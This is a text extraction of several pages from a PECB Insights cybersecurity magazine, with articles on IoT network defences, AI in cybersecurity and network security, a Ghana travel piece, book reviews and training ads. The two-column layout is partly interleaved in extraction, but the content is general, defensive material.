upgrade, or segment them. A cyber evangelist’s most ambitious goal should be a cyber
aware corporate culture throughout the organization,
The vulnerabilities listed in this article represent trending including clerical and hourly staff. In addition to training
security concerns. As technology evolves, new threats programs and information sharing, evangelists can
will emerge. The optimal cybersecurity strategy is to recommend rewards for cyber adoption, incorporate cyber
continuously analyze potential threats and apply best practices into performance reviews, identify performance
practices to mitigate the risk and the potential impact. gaps, and recommend improvement plans.

Data Wipe
Engage cyber team

1
Hardware Demolition
in planning and
ANALYSIS
design to mitigate

2
cyber risk

9
DISPOSAL PLANNING
Incorporate
Cyber Tools

Cyber Scorecard

8
EVALUATION
System 3
DESIGN

Development
Lifecycle
Event Management
Security Control

4
Compliance

7
Asset Management DEVELOPMENT
MAINTENANCE

Continuous monitoring
Training
6
DEPLOYMENT
5
TESTING
Test system for
cyber readiness
Security Controls

Figure 1: System Development Lifestyle

46
insights.pecb.com

Businesses typically lack the system design expertise and


outsource projects to engineering firms. One common
mistake is omitting a cyber readiness design assessment.
Implementing cybersecurity best practices into a system
lifecycle is shown in Figure 1. A system lifecycle is a
standard framework that describes the event sequence
from the initial strategy through system obsolescence. Key
cybersecurity contributions are highlighted through the
system lifecycle. During the design phase, security tools
are integrated into the system design.

The tools consist of both hardware and software platforms


that strengthen the system’s security posture. After the
prototype has been implemented and is ready for a pilot
phase, cyber tools scan the infrastructure, for both,
The partitioning of vulnerable sensors into Virtual Local Area
vulnerabilities and best security practice compliance.
These security gaps must be remedied before the system Networks (VLANs) (also known as network segmentation) is
is activated for use. important to mention at this point.

Event management is a critical gap in cybersecurity. When VLANs partition the network and will restrict traffic from
a data breach or virus infection occurs, key players must the vulnerable sensors into the enterprise. VLANs can also
react to isolate the affected areas, remedy the vulnerability, quarantine compromised devices from the network itself.
collect lessons learned, and recommend strategies to Firewalls and firewall rules can be implemented between
mitigate future risks. VLANs to enhance security between different network
subnets.
To prepare for events, roles and responsibilities must
be clearly defined and processes must be planned and The growth of personal IoT devices used on enterprise
broadcast to the key players. Periodic simulations or networks has increased network vulnerability. The best
rehearsals with key players help refine event sequences,
risk mitigation strategy is to deploy an unsecured wireless
identify dependencies, and address any discovered gaps.
network firewalled from the corporate network. A policy

Asset management has been identified as a key defense mandating these personal assets connect to this network
against cyber risk. IT personnel must track the IoT assets needs to be released and enforced. Tools, such as Network
throughout the lifecycle and manage software updates, Access Control (NAC) can be used to enforce these policies.
configuration changes, repairs, and decommission.
2-Factor Authentication (2FA), also loosely referred to as
If properly managed, the sensors can be properly retired Multifactor Authentication, enhances Access Management
when they are no longer useful. The assets must also have by adding another access variable to strengthen the
their memory wiped and hardware must be demolished so enterprise network’s access portal. The three main types
data is not compromised nor can the hardware be repurposed of authentication are:
or re-engineered to enable unauthorized network access.
 “What I possess?” - Examples include a cell phone
Virtual Private Networks (VPN) can mitigate the risk to receive SMS messaging, an e-mail to receive a
incurred by employees’ use of personal home networks. temporary password, or a key card
VPN’s establish a secure and encrypted internet connection
between the workstation and the corporate network.
 “What I know?” - Ranges from username and password
through security questions that pertain to you
Unfortunately, the VPN’s security is as robust as the device  “Who am I?” - Such as a fingerprint or facial recognition
accessing it. If an employee is using their personal device
on the VPN, then any viruses or malware installed on it 2FA protects against asset theft or password compromise.
can migrate to the corporate network. The best practice In terms of network access via the IoT endpoints, the
with teleworking employees is to distribute laptops with first two options (What I possess and What I know)
enterprise antivirus software and other security tools. are implemented.

47
insights.pecb.com

Tools NAC also replaces port security, where a specific network


port goes to a specific network device. This capability
Scanning tools audit both hardware and software.
eliminates device replication.
Compliance scanners are software tools that audit the
network and notify administrators of devices that do not IoT networks are dynamically scalable and use Certificate
operate on recommended software versions or have not Authority to manage the public key Infrastructure (PKI) for
been properly patched. the network. The CA releases certificates to trusted devices.
When a device comes online and starts communicating, it
Scanning can occur daily, weekly, or monthly. Once non-
L E A D E RS H IP

shares its credentials with the enterprise. If the enterprise


compliant systems are detected, the administrators must
recognizes its credentials, the device is integrated into
update the software and patches to maintain compliance.
the network. If the credentials are not recognized, it is not
Vulnerability scanners are software tools used to detect
allowed to join the network. Figure 2 shows this interaction.
misconfigurations, nonconformance to cybersecurity best
practices, and other risks in network components including Figure 2 (a) and (b), demonstrate a wireless device whose
IoT nodes. Scans can be configured to recommend credentials are not recognized and are firewalled from the
mitigation strategies for reported vulnerabilities. network. In Figure 2 (c) and (d), the enterprise network
recognizes the certificate and allows the device to join the
Network access control (NAC) incorporates Access Control network. PKI can also be used to encrypt the data through
Lists (ACLs) to grant entry into the network. Devices not key use, further hardening the sensor network.
existing in the ACL will either be quarantined or redirected
to a VLAN. NAC can also be configured to restrict An Intrusion Detection System (IDS) actively monitors the
compromised devices from accessing the network. wireless network access and reports anomalous behavior.

Enterprise Enterprise
Cloud Cloud

(a) (b)

Enterprise Enterprise
Cloud Cloud

(c) (d)

Figure 2: Network Access with PKI Certificate Exchange

48
insights.pecb.com

Intrusion Detection Systems can also be configured physical access. Designers can also house the nodes in
to alert administrators when black-listed devices try weather-resistant enclosures with locks. The enclosures
to communicate with the network. IDS can also be can be designed to include an alarm trigger that notifies
configured to alert users of anomalous traffic, such staff when a node is accessed or damaged. The design
as a device repeatedly trying to access one device tradeoff is cost and accessibility to service the nodes.
or cycling through a string of network addresses.
IDS is a monitoring tool and is not used to actively Risk matrices can help identify which vulnerabilities
manage the network. are most likely to cause significant damage and drive
cybersecurity budgets.
Many sensors are placed outside the organization’s secure
perimeter and are not protected by fencing, access A risk matrix is a high-level analysis tool organizations use
controls, and guards. These endpoints are not protected to identify key areas that require the most resources.
from theft or damage. To mitigate risk, designers can
explore placement in inaccessible locations to limit The matrix compares different risks in terms of the

CONSEQUENCE

Negligible Minor Moderate Major Catastrophic


1 2 3 4 5

5 Moderate High Extreme Extreme Extreme


Almost certain 5 10 15 20 25

4 Moderate High High Extreme Extreme


Likely 4 8 12 16 20
LIKELIHOOD

3 Low Moderate High High Extreme


Possible 3 6 9 12 15

Moderate
2 Low 4 Moderate High High
Unlikely 2 6 8 10

1 Low Low Low Moderate Moderate


Rare 1 2 3 4 5

Figure 3: Risk Template

occurrence probability and the potential damage. Figure 3 that require immediate attention while green-colored
shows a generic risk template. cells have minimal impact or probability and can be
passively monitored.
The cells in the matrix are also color-coded to highlight
criticality. Each risk is scored on a scale of 1 to 5 on its A generic scorecard is a dashboard used to continuously
occurrence and impact respectively. Red-colored cells assess cybersecurity training, policies, and infrastructure.
identify risks with the greatest probability and impact A scorecard should be simple and easy to read, however,

49
insights.pecb.com

The top quadrant is an evaluation of how the company’s


EXECUTIVE SUMMARY
cyber posture compares to its competitors. This scorecard

Cyber Risk C B is just an example, but the key data points are the overall
score, the score breakdown to the individual metrics,
RESILIENCY SAFEGUARD such as patch management, the score weighting, and
the trending score over the past year. Other data points
not presented in this scorecard are key security events,
Security Rank
D A such as a data breach or bullets describing deficiencies. A
L E A D E RS H IP

125th of all companies

generic scorecard template can be downloaded or a custom


3rd in Insurance Industry
PRIVACY REPUTATION
Stock: GLC (NYSE) $155.29 (Jul 28)
Headquarters: Hartford, CT
scorecard highlighting key metrics can be designed in a
CEO: Tom Freddy (Nov 29, 2010-) spreadsheet tool.
Revenue: 63.18 billion USD (2016)
Number of employees: 49,500 (2016)
i Digital Footprint

Finally, organizations must complete periodic reevaluation


and audits should be implemented to identify developing
DNS Security
vulnerabilities. Remediation plans are then evaluated and
Email Security implemented to mitigate risk. The Deming Cycle (Plan-Do-
Patch Management Check-Act), shown in Figure 5, is a management framework
used to assess cyber readiness continuously and implement
corrective action. During the Plan stage, multiple strategies
IP/Domain Reputation are evaluated for cost, complexity, and potential efficacy.
Brand Monitoring
The success criteria is also planned during this phase
as is the fallback plan in the event the strategy is not
successfully implemented.
Web Ranking

The best strategy is selected and the implementation


Leaked Credentials

Information Disclosure
team plans the roll-out. The implementation team then
Website Security Fraudulent
integrates the strategy during the Do phase. During the
Check phase, the implementation is evaluated against its
key success factors, and lessons learned are also discussed.
CYBER RISK TREND Finally, in the Act phase, the next improvement is selected
100 based on the success and lessons learned. The Deming
Cycle is repeated as the iteration is planned, implemented,
and evaluated.
75

50

25

0
2016-10 2016-11 2016-12 2017-01 2017-02 2017-03

SCORE DETAILS

A Brand Monitoring C IP/Domain Reputation

D Patch Management F Leaked Credentials

C DNS HEALTH B Website Security

B Email Security A Information Disclosure

Figure 4: Scorecard Example

50
insights.pecb.com

ACT PLAN
Continuous
Improvement

CHECK DO

Figure 5: Deming Cycle

Conclusion
IoT technology represents transformational opportunities
for many businesses. The benefits include; data mining,
new business opportunities, and reduced cost. However,
IoT is a growing vulnerability within enterprise networks.
Many factors, such as training, oversight, and system
design, contribute to this vulnerability. Fortunately, there
are many tools and strategies that can mitigate this risk.
Organizations must determine what their greatest risk
is, develop a strategy to mitigate it, assess the strategy’s
efficacy, and improve the strategy.

Christopher Magnan
Senior Manager of Network
Consolidation | Cloud |
Cybersecurity | Unified
Capabilities

Christopher manages a
telecommunications program
supporting the Defense Information Systems Agency
(DISA). During his career, he has led a team that
has implemented cybersecurity technologies and
best practices, integrated telecommunications, and
implemented Bring Your Own Device (BYOD) to a diverse
global enterprise. Prior to SuprTEK, he managed the
design and deployment of Smart City technology across
Naval District Washington. He received his MBA and
Master’s in Electrical Engineering from the University of
Maryland – College Park.

51
BUS IN E S S & L E ISURE
insights.pecb.com

Sekondi-Takoradi serves as both the capital of the


Sekondi-Takoradi Metropolitan Assembly (STMA)
and the Western Region of Ghana. The twin city is a
coastal city made up of Sekondi and Takoradi. Sekondi
is the older of the two cities. These two cities were
BUS IN E S S & L E ISURE

combined in 1946. Due to the discovery of oil in the


western region, the twin city has been nicknamed,
the oil city of Ghana.

In Sekondi, you can see old and new buildings on a hilly


site that extends to the seashore. Its old port is used by
craft boats and fishing vessels, and it is adjacent to a
naval station. Several modern buildings and tree-shaded
residential areas are present in Takoradi, which is well-
planned to accommodate the lifestyle.

Economic Activities
The city is the industrial and commercial hub of the
Western Region. Some of the prominent industries in the
city include; cement factories, flour mills, harbor, crude
oil production, cocoa processing, timber production, and
fishing. Also, the majority of government installations can
be found here.

The city can be accessed both by road and by air from


any part of the country. It is approximately a four hour
journey by road and 40 minutes by air from Accra, the
capital of Ghana.
The museum contains about 2000 artifacts, sculptures,
The city hosts the Essipong Sports Stadium, which is a
and photos of African heroes, and other international
multi-purpose stadium with a capacity of 20,000 people. It
African heroes across the world.
also hosts the Takoradi Mall, which is the largest modern
shopping center in the region. Some of these artifacts narrate some of the events of the
slave trade in Africa.
Places to visit
There are numerous places one can visit in the city. This The Festivals
includes beaches, pubs, nightclubs, and cinemas. Some
The name of the twin city cannot be mentioned without the
of the popular beaches in the city include Last Hour
popular annual Takoradi Street Carnival, which attracts
Cultural Beach, Africa Beach, Vienna City Beach, and
lots of tourists. This carnival which is also known as the
Sports Club Beach.
Ankos Festival is celebrated during every Christmas, from
Tourists and travelers can have first-class accommodation December 24th to 26th, and concludes on January 1st,
in hotels like Best Western Plus Atlantic Hotel, The Eagles which is New Year’s day.
group of Hotels, Raybow International Hotel, Planters Lodge,
Tens of different groups of masqueraders assemble to
and Airport Ridge Villa, however, there are many other
entertain themselves and the public by showcasing their
options for those seeking a more local-like experience.
unique dances, dresses, and brass band music. The best
One of the major places to visit in the city is the Bisa group of masqueraders is given an award by the sponsors,
Aberwa Museum. Bisa Aberwa in the local language means based on the set criteria. This festival attracts thousands
“ask old lady”. The museum is located in Nkontompo, of masqueraders and spectators across the country. This is
a suburb of the city. one of the festivals people would not like to miss in Ghana.

54
insights.pecb.com

This used to be a gathering for churches in Sekondi but the


youth of Sekondi, led by Nana Eshun, Ebenezer Kwamena
Thompson, John Sencherey, Richard Kirk Mensah, and
Kingsley Jonsia later revamped it to the current version.

This program takes place on Good Friday, Easter Saturday,


and Sunday of each year. On the Good Friday, a replica
of Judas is tied and beaten mercilessly. They then move
on a procession in town to mourn the death of Jesus. In
the subsequent days, popular musicians and upcoming
artists are invited to perform their music to the audience.
Other activities that take place include modeling,
football competitions, and the sale of goods. This carnival
usually takes place at Kundum square which is popularly
known as Komfoase.

It is also worth mentioning the Potomanto Festival, which


is celebrated every Christmas in Sekondi. The festival was
introduced in Sekondi by Andy Solomon through Ebenezer
Kwamena Thompson.

The name Potomanto in Ghanaian parlance is a large


suitcase that usually contains valuable items like kente,
jewelry, and other expensive clothing. This festival is
celebrated in the last week of every year, from December
29th to January 1st of the following year.

The objective of this festival is to showcase the old rich


traditional culture of Ghana. During this period, very old-
fashioned dresses are worn, and very old vehicles are
displayed on different days based on the schedule. There
are community sports competitions, including soccer
competitions by old prominent Ghanaian footballers.
Cooking competitions also take place, in addition to comedy
shows by local comedians within the city. Old movies are
shown to the participants. Exhibitions of crafts also take
place during the period.

Yesu Asor which translates to “Christ has risen” in English,


is a carnival that takes place during the Easter celebrations.

55
BUS IN E S S & L E ISURE

Conclusion Sherrif Issah


The twin city is a place one can relax and enjoy a very
Information Security | Risk
and Compliance | Business
good stay for holidays, training and conferences. To have
Continuity | Public Speaker
a fuller experience in the city, you need to visit during the Columnist
Christmas and Easter holidays. It is a place I will strongly
recommend for anyone wanting to have a better feel and
Sherrif Issah is an Information
view of Ghana.
Security Governance, Risk and
Compliance Professional, and a Data Privacy activist
Partnership with PECB with 15 years of work experience. He is a Cybersecurity
Manager at Deloitte Ghana, a Subject Matter Expert for
With PECB being the global lead in ISO Certification
EC-Council, and Director of Communications for the
trainings, we have been able to tap into its expertise and
Institute of ICT Professionals Ghana (IIPGH).
reputable brand to render quality services to the people of
Ghana, through our partnership. He consults for institutions across Africa; on the
implementation, maintenance, and auditing of
These trainings have been successful due to the timely
international security standards and frameworks.
support and interventions we have received from PECB. The
As a PECB Certified Trainer, he facilitates ISO Lead
marketing support provided by PECB has been very valuable
Implementer, Lead Auditor, and Lead Manager
to our partnership and we encourage PECB to continue the
courses for PECB.
good work. We welcome individuals who want to take any
of the PECB ISO Certification trainings in Ghana. This offers He is a columnist with several articles to his credit and
these candidates the opportunity to kill two birds with one has spoken at local and international conferences on
stone: they can experience the Twin City of Ghana and also cybersecurity and data privacy. He was a Panelist at the
earn their PECB certifications in addition. PECB Virtual Insights Conference 2021.

We, at The-Eye-See-T, are very willing and available to He holds PECB certifications in ISO/IEC 27001, ISO/
support individuals to successfully attain their preferred IEC 27002, ISO/IEC 27032, ISO 22301, and ISO 37301, in
PECB certifications in Ghana. addition to CCISO and PCIP.

56
insights.pecb.com

57
BOOKS insights.pecb.com

Ensure Your Cyber Safety –


Essential Reads
Due to the misuse of data and the rise in cyber-attacks, ethical hacking, network security, and
cybersecurity have also been on the rise as many organizations rely on them to stay safe and secure.
The need to have your data protected has become very prominent as cyber threats evolve on a worldwide
scale, therefore, every organization must take adequate precautions to protect its sensitive data.

Understanding how to create a secure environment for its users against any malicious activity has become
most organization’s highest priority. Exploiting your organizations vulnerabilities through a process of
evaluating a system for potential security breaches or data threats, in order to fix any vulnerabilities
prior to cyber-attacks is highly important. Get a better understanding on staying protected through the
books listed below:

Internet of Things: What You Need to Know About IoT, Big Data,
Predictive Analytics, Artificial Intelligence, Machine Learning,
Cybersecurity, Business Intelligence, Augmented Reality and Our
Future by Neil Wilkins

With an excellent coverage on IoT and a thorough explanation, this book also
covers topics such as; ethical hacking, predictive analytics, machine learning,
artificial intelligence, cybersecurity, big data, business intelligence, augmented
reality, virtual reality, and much more. With the growth of internets usage this book
presents an understanding of where our future is going and how to be prepared
for it. It covers concepts and methods powering the most aspiring technological
concepts of our century, the Internet of Things (IoT), meanwhile elaborating on
gadgets and tools to use to stay better prepared for the future of the internet. A
well-written and knowledge-based reference book for anyone who is interested in
deepening their knowledge on IoT and relevant technologies.

58
insights.pecb.com

Cybersecurity – Attack and Defense Strategies 2nd Edition by


Yuri Diogenes and Erdal Ozkaya

This book delves into recent trends in threats and cyber defense, with great information
included on various recent or growing technologies such as; Zero Trust, Cloud Security,
Cyber Kill Chain, identifying types of cyber-attacks, and much more. It offers an
understanding of how cyber-criminals gain access to organizations and provides a
framework of how organizations could protect themselves with cybersecurity defense
strategies that are well laid out and easy to follow. A highly informative book for a wide
range of audiences, from those who are new to cybersecurity to experts who want to
self-review. For those new to the security field, this book provides an understanding
that is required to define strategies, implement procedures, and refine the tools at
your disposal to impact the security posture of your organization, whereas, for senior
executives, a high-level holistic view of what the current threat landscape looks like
is provided. With no shortage of case studies of real-world occurrences, cybersecurity
specialists can use this book as a manual to improve their organization’s security posture
through the methods explained.

Advanced Penetration Testing: Hacking the World’s Most Secure


Networks by Wil Allsopp

Nowadays threats are organized, professionally run, and for-profit. All types of
organizations and institutions, from financial institutions, health care organizations,
law enforcement, government agencies, to other high-value targets, need to reinforce
their IT infrastructure and human resources against advanced targeted attacks from
motivated professionals. This book incorporates social engineering, programming, and
vulnerability activities into a multidisciplinary method for targeting and compromising
high-security environments. The author portrays highly advanced topics and in-
depth understanding of penetration testing through each chapter about sample
hacking scenarios, with each chapter exploring different hacking methods in various
environments with real-world examples of hacking networks. Commonly penetration
testing involves low-level hackers attacking a system with a list of known vulnerabilities,
and defenders preventing those hacks using an equally well-known list of defensive
scans. The hackers’ professionality of today's threats operate at a much more complex
level and this book shows you ways to defend your high-security network.

How to Measure Anything in Cybersecurity Risk by Douglas W. Hubbard


and Richard Seiersen

In this book, Hubbard lays out the foundation for decision-making and strategy within
cybersecurity through a solid approach to quantitative risk analysis. Using examples and
common tools, he shows how to apply probability concepts easily to solve questions that
many businesses face today regarding cybersecurity. By presenting a clear framework
for non-mathematicians to become statistically literate, this book debunks common
misconceptions and allows readers to move beyond qualitative “spotlight charts” into
quantifiable probabilities. Presenting a whole new approach to measurement, the author
opened the business world’s eyes to the critical need for a better measurement system,
besides the common; Low, Medium, and High measurements used in cybersecurity. An
insightful read, How to Measure Anything in Cybersecurity Risk motivates organizations
to do a closer examination of its own risk management practices in the context of
cybersecurity. The aim is to airtight data protection and ensure your organization’s
safety, prior to any malicious attacks.

59
The Updated
Version of ISO/IEC 27002
is Available!

The ISO/IEC 27002 training course provides


guidelines for implementing, managing,
and improving information security
management in an organization.

Find the training course that suits you best:

ä ISO/IEC 27002 Introduction


ä ISO/IEC 27002 Foundation
ä ISO/IEC 27002 Manager
ä ISO/IEC 27002 Lead Manager

FIND OUT MORE


insights.pecb.com

The Impact of
AI on Cybersecurity
T E C H N OL OGY

B Y JO HN A . A D E L O Y E

C
yber-attacks are a key concern for every organization
today. As the development of more new technology
to make lives better increases, the chance of being a
victim of a cyber-attack is also on the rise as every system
supposedly has a vulnerability that attackers can exploit
to compromise the system for the purpose of stealing
information, demanding ransom, and to misinform the
public. With the increase in cyber threats that each
organization now has to deal with on daily basis, ranging
from phishing, distributed denial of service, rootkits,
man-in-the-middle, and a few others more. There is now
an urgent need for assistants who can help the security
analysts more proficiently and faster, and this led to the
involvement of artificial intelligence in cybersecurity that
can analyze data faster than humans could do and give
better predictions in the very shortest time possible.

IN THE AGE OF AI
Now in this age of artificial intelligence, where automation
has now become the essence of the fourth industrial
revolution, ranging from web search technology, human
speech analogy, self-driving cars, and a few others. There
is now a higher risk of the system being compromised.
As more systems are now automated, thanks to AI;
now there is also a greater need for its protection to be
automated as well. Many pieces of research have shown
that 2021 recorded the most cybersecurity attacks, and
this number is intensively expected to increase by the
end of 2022 with the majority global workforce grinding
away from the secure confines of a cooperative network as
recorded by Fortinet.

In this age of AI, attacks are becoming faster in their


deployment, and they quickly get to the target because of
the way their program is written. About 10 years ago, we
have a lesser number of programmers and cyber intruders
compared to the large numbers circulating in different
countries of the universe today.

62
insights.pecb.com

While many are leaning towards learning, those on the HOW AI MADE CYBERSECURITY RELIABLE
part are becoming more advanced with new discoveries of
With the involvement of AI, the sustainability of
tools, libraries, and machines.
cybersecurity is continuously greatly improving. It has also
increased system reliability and dependability by helping
Back then, one can use any of the varieties of an antivirus
the system to behave as expected even when it processes
to repel attacks, but now, the attackers are also following
a false input (at least periodically).
trends by becoming smarter in their deployment and
using updated tools. With the help of an AI-based security On the other hand, AI helped in system response
system, an attack can now be detected and repelled advancement - most of the works done previously have
before it even gets to the system, and the data collected relied on applications, and sometimes they take a long time
from the attacks will also be useful in training the AI if it is to load or encounter loading failure due to low memory or
a supervised or a semi-supervised learning model. other possible reasons.

63
insights.pecb.com

But in this era of AI, most of the work is now done at a click
of a button (thanks to machine learning algorithms running
either on the machine or in the cloud, and its operation
consumes lower memory and performs more functions
at a shorter time frame). This machine learning model
understands the system that sends the request and what an
expected output is supposed to look like due to its ability to
read and understand the system’s data (for an unsupervised
T E C H N OL OGY

learning model) in other to process its response.

Other numerous impacts of artificial intelligence have now


offered a strategic advantage to cybersecurity through
its ability to reduce its vulnerability to cyber-attacks, and
some of the cyber-attacks are:

Zero-day Attack – is an exploit through a vulnerability of


an application or a system before such vulnerability would
be detected and patched. It is almost impossible to create
a system or an application without at least a vulnerability
or potential vulnerabilities, which technologically means
all systems are prone to or potentially prone to this
particular threat.

With the help of artificial intelligence, detection of


anomalies in data and sharing of data results can now be
quickly disseminated to the security analysts when the
system detects zero-day threats, even though it may not
be able to stop them, but the result will provide security
analysts with something to start with, rather than having
to do the groundwork themselves which could take a
sizable amount of time, and therefore, unnecessarily delay
the quest to defend the system from being compromised.
Some AI systems even went as far as analyzing the data
gathered by themselves and providing the IT engineers
with insights on the attack surface and suggestions that
can be useful in the process of defending against this
attack. Therefore, using Artificial Intelligence reduces the
Mean-Time-To-Respond (MTTR).

Ransomware Attack – is a type of malware deployed by


attackers to block owners or authorized personnel from
accessing the system, or maybe encrypting the system
data with the hope to demand a ransom before a pass key
to decrypt the system would be given. In this attack, the
network has to be compromised first, while the attacker
finds its way to the domain controller to deploy the
ransomware which blocks access to a server until a ransom
is paid. However, there could be more steps to this if it is a
multi-staged attack.

While most ransomware attack happens on a work-free


day, this is done to delay the responsiveness of the IT
engineer due to fewer cybersecurity engineers on duty.

64
insights.pecb.com

This can happen and has unfortunately happened numerous


times to some organizations. Maximilian Heinemeyer, VP
of Cyber Innovation at Darktrace says, “It’s one thing to
detect an attack that has not been seen before, it’s another
thing to stop its ransomware” – While it is easy to detect
an attack, stopping its encryption is far opposite due to
the limited time. The involvement of AI in such an attack
can help to detect the attack at an earlier stage and repel
it before it gets to the domain controller. Since some
ransomware starts with file encryption, AI can also help
stop the intrusion before it gets to the encryption process.

These are a few attacks among many that a system can be


exposed to, one of the others remaining is phishing mail,
which comes with an intention of gaining access to steal
information which may be login credentials and other types
of data. Artificial Intelligence can help by detecting this
type of mail earlier and killing its command control that will
navigate the victim away from the original page and can
even go as far as killing the attacker's network connection
depending on how the AI algorithm program is written.

DRAWBACKS OF AI ON CYBERSECURITY
While it is true that AI is a smarter machine that can process,
evaluate, and predict faster than human intelligence, it
requires constant updates and enhancement to meet up
with the current trends of attacks, and most times when
this is not done on time, the system can become more
vulnerable due to the AI model limitations to associate
with its usability. AI is not human; it is a machine trained
by a developer (supervised) or allowed to train itself with
available data (unsupervised) to recognize some particular
patterns or do certain tasks based on conditions. Due
to this, AI can raise false alarms when it discovers
discrepancies that are irrelevant as low as web traffic
or network instability, this may lead to the organization
making unnecessary moves to curtail a supposed attack
that never happened and that can even sometimes make
the system more vulnerable during the process of stopping
or discovering what never happened.

Another great setback in fully relying on artificial


intelligence is that it reduces the alertness of the security
experts in that organization as it creates an impression
that AI will always do the most jobs and when the AI itself
is compromised, they find it more difficult to defend the
threat, and that buys time for the attackers to fully operate
and succeed in their quest. If the attacker is skillful enough,
he can even manipulate the AI remotely by just feeding
it with the wrong dataset causing the AI to misbehave
due to data bridges.

65
insights.pecb.com

When talking about the human relationship with the


AI in repelling an attack, it should be limited to humans
monitoring the AI activities, and they must be smart enough
to know when the AI is about to misbehave. Trusting the
AI to do the whole job comes with lots of consequences,
and partially allowing the AI to do part of the job (sharing
the responsibilities with humans) makes the system that
implements the AI even more porous, and that cancels out
T E C H N OL OGY

the benefits of the AI involvement.

The previous initiation of cyber threats is targeted mostly at


stealing information, either for personal usage, demanding
ransom, or for fun. But the new form of recent attack

from attackers now involves AI, and that has provided the
attacker with more influence to attempt to gain full or
partial control of the target systems remotely and went as
far as changing its behavior if necessary or desiring.

Most importantly, relying fully on AI can sometimes lead


to human destruction. Professor Mariarosaria Taddeo of
the Oxford Internet Institute declares, “By adding 8% of
erroneous data to an AI system for drug dosage, attackers
could cause up to 75.06% change of the dosages for half
of the patient relying on the system for treatment”. She
further discussed that similar results can be achieved
by manipulating the categorization models of a neural
network. Once an AI system is launched, attacks on the AI
itself are difficult to detect due to its lack of transparency
because of the dynamic and adaptive nature of an AI
system which makes it almost impossible to explain the
system's internal processes.

CONCLUDING OVERVIEW
Cyber infrastructures are now more exposed to diverse
interruptions and warnings that may be due to the
processing of complex information.

Hardware devices are no more adequate to guarantee the


security of these infrastructures. Due to the buildup of
the internet, attackers now have access to the tools and
expertise that are needed to deploy an attack right at the
convention of their homes.

66
insights.pecb.com

We must fully agree that AI has helped advance the John A. Adeloye
field of security and provide some sophisticated ways of Python Developer | Web Developer |
analyzing, evaluating, predicting, and repelling an attack, Data Analyst | Data Entry Specialist
| CyberSecurity Personnel |
and due to this providence, old hardware conventional
Technology Write
cybersecurity measures are not adequate anymore in
fighting the ever-increasing cyber threats.
John graduated at Brigham Young
The existing cybersecurity methods are now becoming University-Idaho, Rexburg; Idaho.

obsolete due to ineffectiveness. The old common method He currently works as a research Assistant at Strategic
Alpha Investment Advisors Inc., Irvine; California. John is
of cybersecurity through firewalls now has limitations
a solution-driven programming analyst with measurable
in the security process. Therefore, there is now a heavy
experience in Data Analysis using Python Programming and
demand for efficient security measures to defend
Excel, Microsoft Power VI, and Tableau. Well-versed in all
against these newly modern clustered attacks as cyber
phases of Information Technology, and with a strong working
interventions that are carried out by intelligent agents are knowledge of algorithms. Proven success in engineering
not sufficient to meet the pace of these cyber threats, but customized solutions, data entry, computer networking,
also we should not quickly forget the challenges that lie in computer hardware and software, health and safety, and
fully relying on the AI to do all tasks that IT engineers are improving business processes, operations, and profitability.
expected to take care of. You can reach him at [email protected].

67
Certified
Lead Ethical Hacker
T E C H N OL OGY

PECB offers the Certified Lead Ethical


Hacker (CLEH) training course in both,
English and French, enriching our library
of content, quality, and high-liability.
With the increase of cyber-attacks,the
global need for ethical hacking is
increasing as well.

Benefits of getting certified in


Lead Ethical Hacking:

• Mastering methods and techniques

• Learning about different attacks that


affect an organizations security

• Obtaining necessary expertise to


conduct a penetration test

• Gaining the ability to analyze the


results of penetration tests

• Increasing your chances of getting


hired in the security career

• Acquiring the ability to support


organizations’ security

For additional information, please contact us at: [email protected]

68
Become a CMMC Certified
Professional

CMMC framework is a verification mechanism designed


to measure an organization’s maturity level regarding the
protection of unclassified information.

This course is ideal for those interested in learning about


the principles of CMMC, its core concepts, as well as how to
manage and implement it effectively.

Get started now with PECB’s CMMC Training Course:

ä CMMC Certified Professional

LEARN MORE

69
insights.pecb.com

Top Five High-Paying Job Positions


You Can Pursue with an
ISO/IEC 27032 Cybersecurity
C A RE E R

Certification

O
rganizations today are facing fascinating, yet
distressing advancements of technology. The
evolution of technology and its wide application has
come with many limitations, challenges, and countless
sophisticated risks. The frequency of cyber-attacks has
grown exponentially during the last few years and hearing
news of big data breaches is becoming very common. In
order to protect and secure their cyberspace, organizations
must take preventive and safety measures. Cybersecurity
is considered to be in the top five ranked risks of 2022.

According to Cybersecurity Ventures, cybercrime costs


are expected to grow tremendously in a few years,
reaching $10.5 trillion USD annually by 2025. Besides
cybercriminals and cyber-attacks themselves, a top
threat of cybersecurity is considered to be the negligence
of employees who do not follow security guidelines or
are not familiar with cybersecurity and its importance.
ISO/IEC 27032 provides security techniques and guidelines
for cybersecurity.

Considering the high need for cybersecurity experts,


ISO/IEC 27032 Cyber Security Trainings would be a great
solution and asset for any professional who wants to pursue
a successful career in the field of cybersecurity.

ISO/IEC 27032 Cybersecurity Management Certification


enables you to protect an organization from cyber threats,
strengthen your knowledge and skills, and demonstrates
your competencies in cybersecurity.

Note: The salaries presented below are according to


information from PayScale, Glassdoor, and ZipRecruiter.

1. Chief Information Security Officer (CISO)


The average U.S. annual salary of a CISO is $166,150.

72
insights.pecb.com

2. Security Architect The PECB ISO/IEC 27032 Cyber Security training


courses equip participants with the necessary skills
The average U.S. annual salary for an Information Security
and competencies in protecting privacy and data from
Architect is $142,123.
phishing scams, cyber-attacks, hacking, data breaches,
and other cyber threats. ISO/IEC 27032 certification is
3. Cybersecurity Manager
also a competitive advantage that raises the chance of
The average salary of a cybersecurity manager is $129,817. certification holders to get employed.

Note: The salaries of the above-mentioned positions are


4. Cybersecurity Engineer
not definitive and they may change with time and industry
The average salary of a cybersecurity engineer is $106,911. development.

5. Penetration Tester

The average salary of a penetration tester is $95,981.

73
insights.pecb.com

Network Security and Management


A Deeper Understanding
T H E E XPE RT

B Y P A B L O B A RRE RA

T
o talk about network security and management,
we need to split this subject into smaller bits of
information, concepts, and a bit of history. First, let
us go back to the concept of security and where it comes
from. Security is described as the state of being free from
danger or threats. Discussing a network free of dangers or
threats is something utopic and unrealistic, which is why
when we talk about network security we should focus on
reducing or controlling threats to an acceptable level to
the organization and its processes.

Many of the concepts applied to cybersecurity, network


security, information security, and related fields are
concepts already used in military practice. A few
decades ago, we were talking about Demilitarized Zones
in the network to expose our services to the internet;
defense-in-depth, and many other concepts that are
part of the military vocabulary, which is why some of the
concepts still apply.

We can build the concept of network security as the


strategies, policies, processes, and technologies used
to secure an organization’s data, applications, devices,
systems, and resources connected to the organization’s
network. It is important to understand that network security
is a part of cybersecurity. In the past, we used to see
organizations as castles or fortresses and the data as the
gold inside the chest located in the safest room in the castle.

How important can Network Security be for an


organization?
Nowadays, we need to see our organizations as ships, ships
